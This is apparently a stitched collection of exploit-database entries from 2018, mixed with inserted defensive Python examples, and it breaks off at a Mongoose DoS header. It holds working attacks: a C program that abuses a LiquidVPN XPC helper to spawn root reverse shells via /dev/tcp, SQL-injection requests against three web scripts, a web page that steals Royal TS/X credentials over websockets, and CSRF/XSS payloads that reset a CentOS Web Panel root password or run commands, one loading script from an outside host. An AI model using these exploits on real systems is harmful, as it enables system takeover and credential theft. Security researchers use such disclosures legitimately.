
/*
=======================================================================
Title: Multiple Privilege Escalation Vulnerabilities
Product: LiquidVPN for MacOS
Vulnerable versions: 1.37, 1.36 and earlier
CVE ID(s): CVE-2018-18856, CVE-2018-18857, CVE-2018-18858, CVE-2018-18859
Impact: Critical
Homepage: https://www.liquidvpn.com
Identified: 2018-09-29
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================

Vendor description:
-------------------
"LiquidVPN creates a secure encrypted link between your device and the Internet.
When you connect to the Internet from your home, mobile device, office or a WiFi
hotspot with encryption your traffic can’t be monitored by 3rd parties like your
ISP. Without encryption, your ISP can store information about the websites you
use and sell that data to anyone willing to pay for it. Some ISPs even inject
advertisements into web pages to further profit off of the Internet service you
pay for."

Source: https://www.liquidvpn.com


Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker
can fully compromise a MacOS system with an installation of the LiquidVPN
client.

Users are urged to uninstall the application until the vendor ships a new
version of the LiquidVPN client.


Vulnerability overview/description:
-----------------------------------
LiquidVPN installs the helper tool "com.smr.liquidvpn.OVPNHelper" for performing
privileged (root) actions. In order to allow other LiquidVPN components to send
messages to the helper tool, it implements an XPC service. Static code analysis
showed that the XPC service does not filter incoming messages. This means that
regular users (local attackers) can craft arbitrary XPC messages and send them
to the service. This leads to the following issues:


1) "anycmd" Privilege Escalation (reserved CVE-2018-18857)

After receiving a message, the service checks for the existence of the
"anycmd" parameter:

============================================================================================
...
__text:00000001000012E8                 lea     rsi, aAnycmd    ; "anycmd"
__text:00000001000012EF                 mov     rdi, r14        ; char *
__text:00000001000012F2                 call    _strcmp
__text:00000001000012F7                 test    eax, eax
__text:00000001000012F9                 jnz     loc_1000016C2
__text:00000001000012FF                 mov     [rbp+var_10A38], r15
__text:0000000100001306                 lea     rsi, aCommandLine ; "command_line"
__text:000000010000130D                 mov     rdi, rbx
...
__text:0000000100001336                 lea     rsi, aR         ; "r"
__text:000000010000133D                 mov     rdi, r14        ; char *
__text:0000000100001340                 call    _popen
...
============================================================================================

If "anycmd" is found, the "command_line" parameter is extracted from the message
and directly passed on to a call to popen() as an argument.


2) "openvpncmd" Privilege Escalation (reserved CVE-2018-18856)

Similar to the previous vulnerability, the service checks if the "openvpn"
parameter exists. If it does, the "openvpncmd" parameter is extracted and passed
on to a system() call as an argument:

============================================================================================
...
__text:00000001000013F1                 lea     rsi, aOpenvpncmd ; "openvpncmd"
__text:00000001000013F8                 mov     rdi, rbx
__text:00000001000013FB                 call    _xpc_dictionary_get_string
...
__text:000000010000166A                 mov     rdi, r15        ; char *
__text:000000010000166D                 call    _system
__text:0000000100001672                 lea     rsi, aReply     ; "reply"
__text:0000000100001679                 lea     rdx, aOpenvpnCommand ; "openvpn command executed (ver 3)"
__text:0000000100001680                 mov     rdi, r12
__text:0000000100001683                 call    _xpc_dictionary_set_string
...
============================================================================================

3) OS Command Injection (reserved CVE-2018-18858)

If the service detects the "openvpn" parameter in a message, it also checks if
the parameters "tun_path" or "tap_path" exist. If one of them (or both) are found,
the values are used as source paths for a copy process using the system() function.
However, the paths are not sanitized before being passed to system():

============================================================================================
...
__text:00000001000013CD                 lea     rsi, aPathTun   ; "path_tun"
__text:00000001000013D4                 mov     rdi, rbx
__text:00000001000013D7                 call    _xpc_dictionary_get_string
__text:00000001000013DC                 mov     r14, rax
__text:00000001000013DF                 lea     rsi, aPathTap   ; "path_tap"
__text:00000001000013E6                 mov     rdi, rbx
__text:00000001000013E9                 call    _xpc_dictionary_get_string
...
__text:000000010000143F                 call    _strcat
__text:0000000100001444                 mov     rdi, rbx        ; char *
__text:0000000100001447                 call    _strlen
...
__text:0000000100001497                 mov     rdi, rbx        ; char *
__text:000000010000149A                 call    _system
..
============================================================================================

4) Loading of arbitrary Kernel Extensions (reserved CVE-2018-18859)

The previous vulnerability can also be used to directly install an arbitrary
kernel extension. When the client is installed, "tun_path" and "tap_path" are
pointed to the application folder for installing
"/Applications/LiquidVPN.app/Contents/Resources/tun.kext" and
"/Applications/LiquidVPN.app/Contents/Resources/tap.kext".
By crafting an XPC message containing attacker-controlled kernel extension paths,
the helper tool installs the kernel extensions using a call to the system function
kextload(). Note: Since MacOS 10.13, a Kext needs to be signed. In addition to that,
Apple introduced user-approval for installing third party kernel extensions. However,
as an attacker has local access to the system and user-approval does not require the
user to enter a root or admin password, this is not a problem.


Proof of concept:
-----------------
The following proofs of concept can be used to execute arbitrary system commands:

1) "anycmd" Privilege Escalation

============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "anycmd");
xpc_dictionary_set_bool(message, "blocking", FALSE);
xpc_dictionary_set_string(message, "command_line", "[ARBITRARY CMD]");
...
============================================================================================

2) "openvpncmd" Privilege Escalation

============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "openvpncmd", "[ARBITRARY CMD]");
...
============================================================================================

3) OS Command Injection

============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;[ARBITRARY CMD]");
...
============================================================================================

4) Loading of arbitrary Kernel Extensions

============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "[PATH TO KEXT]");
...
============================================================================================


Vulnerable / tested versions:
-----------------------------
The following versions have been tested and found to be vulnerable:
1.37 (most recent) and 1.36.

Earlier versions might be vulnerable as well.


Vendor contact timeline:
------------------------
2018-10-04: Requested security contact via twitter @LiquidVPN
2018-10-11: Contacted vendor through dave@liquidvpn.com
2018-10-11: Sent PGP encrypted advisory (https://my.liquidvpn.com/canary/syswan)
2018-10-17: Requested status update from vendor
2018-10-30: Sent new contact details & public PGP key to dave@liquidvpn.com
2018-10-30: Received vendor notification:
            No patches will be issued as the LiquidVPN client for MacOS will be
            replaced by new app in the future
2018-10-31: Published to Full Disclosure Mailing List

Solution:
---------
None.


Workaround:
-----------
None.


EOF B. Leitner / @2018
*/

// start netcat listener on port 9999

#include <stdio.h>
#include <stdlib.h>     // atoi
#include <unistd.h>     // rmdir
#include <sys/stat.h>
#include <sys/types.h>
#include <xpc/xpc.h>

void what(const char *bin) {
    printf("%s <1-4>\n", bin);
    printf("[1] Privesc (local reverse shell on port 9999 via \"anycmd\")\n");
    printf("[2] Privesc (local reverse shell on port 9999 via \"openvpncmd\")\n");
    printf("[3] Privesc (local reverse shell on port 9999 via OS command injection)\n");
    printf("[4] KEXT (load arbitrary kernel extension from /tmp/tun.kext (has to be signed for MacOS >= 10.13))\n");
}
 
int main(int argc, const char *argv[]) {

    if (argc == 1 || argc > 2) {
        what(argv[0]);
        return 0;
    }

    int option = atoi(argv[1]);
    xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0);

    switch(option) {
        case 1:
            // "anycmd"
            xpc_dictionary_set_string(message, "cmd", "anycmd");
            xpc_dictionary_set_bool(message, "blocking", FALSE);
            xpc_dictionary_set_string(message, "command_line", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1");
            break;
        case 2:
            // "openvpncmd"
            xpc_dictionary_set_string(message, "cmd", "openvpn");
            xpc_dictionary_set_string(message, "openvpncmd", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1");
            break;
        case 3:
            // cmd injection via "path_tun". "path_tap" is affected by the same bug
            mkdir("/tmp/__dummy00_", 0755);
            xpc_dictionary_set_string(message, "cmd", "openvpn");
            xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;bash -i >& /dev/tcp/127.0.0.1/9999 0>&1;cat");
            rmdir("/tmp/__dummy00_");
            break;
        case 4:
            // load arbitrary kext via "path_tun". "path_tap" is affected by the same bug
            xpc_dictionary_set_string(message, "cmd", "openvpn");
            xpc_dictionary_set_string(message, "path_tun", "/tmp/tun.kext");
            break;
        default:
            what(argv[0]);
            return 0;
    }

    printf("[+] sending xpc message.\n");

    xpc_connection_t connection = xpc_connection_create_mach_service("com.smr.liquidvpn.OVPNHelper", NULL, 0);
    if (connection == NULL) {
        printf("[-] connection to xpc service failed.\n");
        return 1;
    }

    xpc_connection_set_event_handler(connection, ^(xpc_object_t e) {
        // we don't need that here.
    });

    xpc_connection_resume(connection);

    printf("[+] check your listener.\n");
    xpc_object_t result = xpc_connection_send_message_with_reply_sync(connection, message);

    printf("[+] bye.\n");

    return 0;
}
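The message handling described in the advisory, modelled as an added example (not code from the advisory or from LiquidVPN). It shows how a shell splits a caller-supplied `path_tun` value into two commands, next to a handler that refuses raw command strings, pins the kext paths to the two bundled locations and returns argv lists for a non-shell exec. The `cp -R ... /tmp/kext_stage` template, the `id` sample value and all function names are assumptions.

```python
import shlex

# Bundled kext locations named in the advisory; the only sources the helper needs.
ALLOWED_KEXTS = frozenset({
    "/Applications/LiquidVPN.app/Contents/Resources/tun.kext",
    "/Applications/LiquidVPN.app/Contents/Resources/tap.kext",
})
# Keys whose values the vulnerable helper hands to popen()/system() verbatim.
RAW_COMMAND_KEYS = ("command_line", "openvpncmd")
STAGE_DIR = "/tmp/kext_stage"  # assumption: hypothetical copy destination


class RejectedMessage(ValueError):
    """Raised when a message must not lead to any privileged action."""


def shell_commands(line):
    """Split a string the way a shell separates commands, without running it."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token and set(token) <= set(";&|"):  # control operator ends a command
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def vulnerable_copy_command(message):
    """Vulnerable pattern: caller-controlled path concatenated into a shell string."""
    return "cp -R " + message["path_tun"] + " " + STAGE_DIR


def hardened_copy_argv(message):
    """Return argv lists for exec without a shell, or raise RejectedMessage.

    A real helper would also authenticate the connecting process before
    looking at the message; that step is outside this model.
    """
    for key in RAW_COMMAND_KEYS:
        if key in message:
            raise RejectedMessage(f"{key}: raw command strings are not accepted")
    if message.get("cmd") != "openvpn":
        raise RejectedMessage("unknown cmd")
    argvs = []
    for key in ("path_tun", "path_tap"):
        if key in message:
            if message[key] not in ALLOWED_KEXTS:  # exact match, no prefix tricks
                raise RejectedMessage(f"{key} is not a bundled kext")
            argvs.append(["/bin/cp", "-R", message[key], STAGE_DIR])
    return argvs


def verdict(message):
    """Run the hardened handler and fold a rejection into a string."""
    try:
        return hardened_copy_argv(message)
    except RejectedMessage as exc:
        return f"rejected: {exc}"


# Constructed sample messages using the keys from the advisory's PoC snippets.
INJECTED = {"cmd": "openvpn", "path_tun": "/tmp/__dummy00_;id"}
FOREIGN_KEXT = {"cmd": "openvpn", "path_tun": "/tmp/tun.kext"}
ANYCMD = {"cmd": "anycmd", "command_line": "id"}
BUNDLED = {"cmd": "openvpn",
           "path_tun": "/Applications/LiquidVPN.app/Contents/Resources/tun.kext"}

if __name__ == "__main__":
    print("shell sees:", shell_commands(vulnerable_copy_command(INJECTED)))
    for msg in (INJECTED, FOREIGN_KEXT, ANYCMD, BUNDLED):
        print(msg["cmd"], "->", verdict(msg))
```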
            
# Summary

This is a proof-of-concept exploit of the PortSmash microarchitecture attack, tracked by CVE-2018-5407.

![Alt text](parse_raw_simple.png?raw=true "Title")

# Setup

## Prerequisites

A CPU featuring SMT (e.g. Hyper-Threading) is the only requirement.

This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in `spy` is likely needed.

## OpenSSL

Download and install OpenSSL 1.1.0h or lower:

    cd /usr/local/src
    wget https://www.openssl.org/source/openssl-1.1.0h.tar.gz
    tar xzf openssl-1.1.0h.tar.gz
    cd openssl-1.1.0h/
    export OPENSSL_ROOT_DIR=/usr/local/ssl
    ./config -d shared --prefix=$OPENSSL_ROOT_DIR --openssldir=$OPENSSL_ROOT_DIR -Wl,-rpath=$OPENSSL_ROOT_DIR/lib
    make -j8
    make test
    sudo checkinstall --strip=no --stripso=no --pkgname=openssl-1.1.0h-debug --provides=openssl-1.1.0h-debug --default make install_sw

If you use a different path, you'll need to make changes to `Makefile` and `sync.sh`.

# Tooling

## freq.sh

Turns off frequency scaling and TurboBoost.

## sync.sh

Sync trace through pipes. It has two victims, one of which should be active at a time:

1. The stock `openssl` running `dgst` command to produce a P-384 signature.
2. A harness `ecc` that calls scalar multiplication directly with a known key. (Useful for profiling.)

The script will generate a P-384 key pair in `secp384r1.pem` if it does not already exist.

The script outputs `data.bin` which is what `openssl dgst` signed, and you should be able to verify the ECDSA signature `data.sig` afterwards with

    openssl dgst -sha512 -verify secp384r1.pem -signature data.sig data.bin

In the `ecc` tool case, `data.bin` and `secp384r1.pem` are meaningless and `data.sig` is not created.

For the `taskset` commands in `sync.sh`, the cores need to be two logical cores of the same physical core; sanity check with

    $ grep '^core id' /proc/cpuinfo
    core id		: 0
    core id		: 1
    core id		: 2
    core id		: 3
    core id		: 0
    core id		: 1
    core id		: 2
    core id		: 3

So the script is currently configured for logical cores 3 and 7 that both map to physical core 3 (`core_id`).

## spy

Measurement process that outputs measurements in `timings.bin`. To change the `spy` strategy, check the port defines in `spy.h`. Only one strategy should be active at build time.

Note that `timings.bin` is actually raw clock cycle counter values, not latencies. Look in `parse_raw_simple.py` to understand the data format if necessary.

## ecc

Victim harness for running OpenSSL scalar multiplication with known inputs. Example:

    ./ecc M 4 deadbeef0123456789abcdef00000000c0ff33

Will execute 4 consecutive calls to `EC_POINT_mul` with the given hex scalar.

## parse_raw_simple.py

Quick and dirty hack to view 1D traces. The top plot is the raw trace. Everything below is a different digital filter of the raw trace for viewing purposes. Zoom and pan are your friends here.

You might have to adjust the `CEIL` variable if the plots are too aggressively clipped.

Python packages:

    sudo apt-get install python-numpy python-matplotlib

# Usage

Turn off frequency scaling:

    ./freq.sh

Make sure everything builds:

    make clean
    make

Take a measurement:

    ./sync.sh

View the trace:

    python parse_raw_simple.py timings.bin

You can play around with one victim at a time in `sync.sh`. Sample output for the `openssl dgst` victim is in `parse_raw_simple.png`.

# Credits

* Alejandro Cabrera Aldaya (Universidad Tecnológica de la Habana (CUJAE), Habana, Cuba)
* Billy Bob Brumley (Tampere University of Technology, Tampere, Finland)
* Sohaib ul Hassan (Tampere University of Technology, Tampere, Finland)
* Cesar Pereida García (Tampere University of Technology, Tampere, Finland)
* Nicola Tuveri (Tampere University of Technology, Tampere, Finland)




EDB Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45785.zip

            
# Exploit Title: Voovi Social Networking Script 1.0 - 'user' SQL Injection
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.adminspoint.com/voovi/index.php
# Software Link: https://netix.dl.sourceforge.net/project/voovi/voovi%20a%20social%20networking%20script.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/?
# 
POST /[PATH]/? HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
user=1' UNION SELECT NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL-- -&password=&action=login&submit=
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 14:22:41 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=v8nhfofpnrt6a4clfqbrp7aa00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5987
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
            
<!--
Title: Royal TS/X - Information Disclosure
Author: Jakub Palaczynski
Date: 10. July 2018
CVE: CVE-2018-18865

Affected product:
=============

Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta


Vulnerability - Information Disclosure:
=============================

Any third party web application can steal credentials created in Royal TS/X
when browser extension is enabled.
Browser extension communicates using websockets (default TCP port 54890)
and websockets do not use any validation to verify origin of the request.


PoC website:
==========
-->

  <!DOCTYPE html>
  <meta charset="utf-8" />
  <title>RoyalTS/X Exploit</title>
  <script language="javascript" type="text/javascript">

  var wsUri = "ws://127.0.0.1:54890/";
  var output;

  function init()
  {
    output = document.getElementById("output");
    testWebSocket();
  }

  function testWebSocket()
  {
writeToScreen("Let's retrieve some data...");
    websocket = new WebSocket(wsUri);
    websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
    websocket.onclose = function(evt) { onClose(evt) };
    websocket.onmessage = function(evt) { onMessage(evt) };
    websocket.onerror = function(evt) { onError(evt) };
  }

  function onOpen(evt,message)
  {
    doSend(message);
  }

  function onClose(evt)
  {
  }

  function onMessage(evt)
  {
var obj = JSON.parse(evt.data);
if (obj['Command'] == "GetDocuments") {
for (var x in obj['ResponseData']){
writeToScreen("Name: " + obj['ResponseData'][x]['Name']);
writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']);
for (var y in obj['ResponseData'][x]['Credentials']){
writeToScreen("Username: " +
obj['ResponseData'][x]['Credentials'][y]['UserName']);
writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']);
if (obj['ResponseData'][x]['Unlocked'] == true){
websocket.close();
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\""
+ obj['ResponseData'][x]['Credentials'][y]['ID'] +
"\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}
}
}
}
else {
if (obj['Command'] == "GetLoginInformation") {
var obj = JSON.parse(evt.data);
writeToScreen("AutoFill Data: " + atob(obj['ResponseData']));
}
}
  }

  function onError(evt)
  {
    writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);
  }

  function doSend(message)
  {
    websocket.send(message);
  }

  function writeToScreen(message)
  {
    var pre = document.createElement("p");
    pre.style.wordWrap = "break-word";
    pre.innerHTML = message;
    output.appendChild(pre);
  }

  window.addEventListener("load", init, false);

  </script>

  <h2>RoyalTS/X Exploit</h2>

  <div id="output"></div>

<!--
Contact:
=======

Jakub[dot]Palaczynski[at]gmail[dot]com
-->
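The missing origin validation described above, as an added example that is not part of the advisory or of Royal TS/X: a handshake check that answers a WebSocket upgrade only when the `Origin` header is allow-listed. The extension origin is a placeholder and the function names are assumptions; the sample handshake is constructed.

```python
import base64
import hashlib

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed value from RFC 6455
# Assumption: placeholder for the origin of the vendor's own browser extension.
ALLOWED_ORIGINS = frozenset({"chrome-extension://EXTENSION_ID_PLACEHOLDER"})


def parse_headers(raw):
    """Return (request_line, {lower-case header name: value}) for a raw request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def handshake_response(raw, allowed_origins=ALLOWED_ORIGINS):
    """Answer a WebSocket upgrade only when the Origin header is allow-listed."""
    _, headers = parse_headers(raw)
    key = headers.get("sec-websocket-key")
    if headers.get("upgrade", "").lower() != "websocket" or not key:
        return b"HTTP/1.1 400 Bad Request\r\n\r\n"
    # Browsers set Origin on WebSocket handshakes and page script cannot change
    # it, so an exact match separates the extension from arbitrary web pages.
    # A non-browser local client can send any Origin; this check covers the
    # third-party web page case only.
    if headers.get("origin") not in allowed_origins:
        return b"HTTP/1.1 403 Forbidden\r\n\r\n"
    digest = hashlib.sha1((key + WS_GUID).encode()).digest()
    accept = base64.b64encode(digest).decode()
    return ("HTTP/1.1 101 Switching Protocols\r\n"
            "Upgrade: websocket\r\n"
            "Connection: Upgrade\r\n"
            f"Sec-WebSocket-Accept: {accept}\r\n\r\n").encode()


def build_request(origin=None):
    """Constructed handshake to the default port; the key is the RFC 6455 sample."""
    lines = ["GET / HTTP/1.1",
             "Host: 127.0.0.1:54890",
             "Upgrade: websocket",
             "Connection: Upgrade",
             "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==",
             "Sec-WebSocket-Version: 13"]
    if origin is not None:
        lines.append(f"Origin: {origin}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def status_line(response):
    """First line of a response, for display and checks."""
    return response.split(b"\r\n", 1)[0].decode()


if __name__ == "__main__":
    for origin in ("http://third-party.example",
                   None,
                   "chrome-extension://EXTENSION_ID_PLACEHOLDER"):
        print(origin, "->", status_line(handshake_response(build_request(origin))))
```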
            
There is a memory corruption issue when processing a malformed RTP video stream in FaceTime that leads to a kernel panic due to a corrupted heap cookie or data abort. This bug can be reached if a user accepts a call from a malicious caller. This issue only affects FaceTime on iOS; it does not crash on a Mac.

The issue can be reproduced using the attached sequence of RTP packets. To reproduce the issue:

    1) Build video-replay.c in attached zip (gcc -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
    2) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
    3) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
    4) Restart the machine
    5) Extract the attached out folder in the zip to /out and change the permissions so it's readable by AVConference
    6) Call target, when they pick up, the phone will crash


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45786.zip
            
# Exploit Title: ServerZilla 1.0 - 'email' SQL Injection
# Dork: N/A
# Date: 2018-11-08
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://serverzilla.sourceforge.io/
# Software Link: https://ayera.dl.sourceforge.net/project/serverzilla/ServerZilla_src.zip
# Version: 1.0 
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/reset.php
# 
POST /[PATH]/reset.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
email=%27%20%4f%52%20%4e%4f%54%20%31%3d%31%2d%2d%20%45%66%65&code=
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2018 19:57:09 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1117
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
            
# Title: CentOS Web Panel Root Account Takeover + Remote Command Execution <= v0.9.8.740
# Author: InfinitumIT (https://infinitumit.com.tr)
# Vendor Homepage: centos-webpanel.com
# Software Link: http://centos-webpanel.com/cwp-latest
# Version: Up to v0.9.8.740.
# CVE: CVE-2018-18773, CVE-2018-18772 and CVE-2018-18774.
# Detailed: https://numanozdemir.com/respdisc/cwp.pdf

# Description:
# An attacker can change the target server's root password and execute commands through a CSRF vulnerability.
# There is also an XSS vulnerability; a hacker can exploit the CSRF vulnerability through this XSS
# vulnerability and run malicious JavaScript code in the administrator's browser.
# So, CSRF/XSS leads to full server takeover.

# How to Reproduce:
# A hacker can exploit this vulnerability (changing the root password) by XSS or CSRF.
# The hacker creates a website and puts this code into its source:
<script>
var url = "http://targetserver:2030/admin/index.php?module=rootpwd";
var params = "ifpost=yes&password1=newpassword&password2=newpassword";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);
</script>

# (Replace newpassword with the password that you want to set.)

# If the hacker wants to exploit this by CSRF, the CWP administrator has to visit the hacker's website.
# But if the hacker wants to exploit this by XSS, the CWP administrator has to click this link (on the admin's own website):
# http://targetserver:2030/admin/index.php?module=<script%20src=//hackerswebsite.com/password.js></script>
# After exploiting, you can connect to the server by Putty or access the CWP panel on port 2030
# with the password that you have specified.

# The second vulnerability is remote command execution.
# A hacker can exploit this vulnerability (remote command execution) by XSS or CSRF too.
# Again, the hacker creates a website and puts this code into its source:

<script>
var url = "http://targetserver:2030/admin/index.php?module=send_ssh";
var params = "ssh+command=whoami";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);
</script>

# (Replace whoami with the command that you want to run.)

# Same logic as above: if the hacker wants to exploit this by CSRF, the CWP administrator has to visit the hacker's website.
# But if the hacker wants to exploit this by XSS, the CWP administrator has to click this link (on the admin's own website):
# http://targetserver:2030/admin/index.php?module=<script%20src=//hackerswebsite.com/command.js></script>

# You shouldn't think that CSRF/XSS are unimportant vulnerabilities.
# For secure days...
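A server-side check for the two requests shown above, as an added example that is not CentOS Web Panel code: the `module` value must be a plain identifier, which blocks the reflected `<script>` value, and the state-changing modules `rootpwd` and `send_ssh` require a token bound to the administrator's session. The `csrf_token` field name, the secret and the session id are assumptions; the sample requests are constructed from the page's URLs and parameters.

```python
import hashlib
import hmac
import re
from urllib.parse import parse_qs, urlsplit

SERVER_SECRET = b"constructed-demo-secret"    # assumption: per-install random key
MODULE_RE = re.compile(r"[a-z0-9_]{1,32}")    # shape of names like rootpwd, send_ssh
STATE_CHANGING = frozenset({"rootpwd", "send_ssh"})


def csrf_token(session_id):
    """Token bound to the admin session; a third-party page cannot read or derive it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_request(method, url, body, session_id):
    """Return (status, reason) for a request to /admin/index.php."""
    module = parse_qs(urlsplit(url).query).get("module", [""])[0]
    if not MODULE_RE.fullmatch(module):
        # Anything that is not a bare identifier is never echoed back or dispatched.
        return 400, "module is not a plain identifier"
    if module in STATE_CHANGING:
        if method != "POST":
            return 405, "state change requires POST"
        supplied = parse_qs(body).get("csrf_token", [""])[0]
        expected = csrf_token(session_id)
        # Compare as bytes so non-ASCII input cannot raise, and in constant time.
        if not hmac.compare_digest(supplied.encode(), expected.encode()):
            return 403, "missing or wrong CSRF token"
    return 200, "ok"


# Constructed sample requests based on the URLs and parameters in the advisory.
SESSION = "constructed-session-id"
BASE = "http://targetserver:2030/admin/index.php"
FORGED_PWD = ("POST", BASE + "?module=rootpwd",
              "ifpost=yes&password1=newpassword&password2=newpassword")
FORGED_CMD = ("POST", BASE + "?module=send_ssh", "ssh+command=whoami")
REFLECTED = ("GET",
             BASE + "?module=<script%20src=//hackerswebsite.com/password.js></script>",
             "")
LEGITIMATE = ("POST", BASE + "?module=rootpwd",
              "ifpost=yes&password1=x&password2=x&csrf_token=" + csrf_token(SESSION))

if __name__ == "__main__":
    for name, req in (("forged rootpwd", FORGED_PWD), ("forged send_ssh", FORGED_CMD),
                      ("reflected module", REFLECTED), ("with token", LEGITIMATE)):
        print(name, "->", check_request(*req, SESSION))
```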
            
# Exploit Title: Nominas 0.27 - 'username' SQL Injection
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://arixolab.com/proyecto.html
# Software Link: https://netix.dl.sourceforge.net/project/nominascrm/Nominas%20v0.27.tar.gz
# Version: 0.27
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/login/checklogin.php
# 
POST /[PATH]/login/checklogin.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/login/login.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 160
username=%27+UNION+ALL+SELECT+0x31%2C0x32%2C0x33%2CCONCAT_WS%280x203a20%2CUSER%28%29%2CDATABASE%28%29%2CVERSION%28%29%29--+Ver+Ayari&password=Efe&logarse=Entrar
HTTP/1.1 302 Found
Date: Fri, 09 Nov 2018 23:08:26 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=agq97ac0093v2f94voc6qfr7j3; path=/
Set-Cookie: PHPSESSID=mqvaree7bi45p9q60fh2g5vhg1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: ../index.php
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
            
# Exploit Title: Mongoose Web Server 6.9 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-11
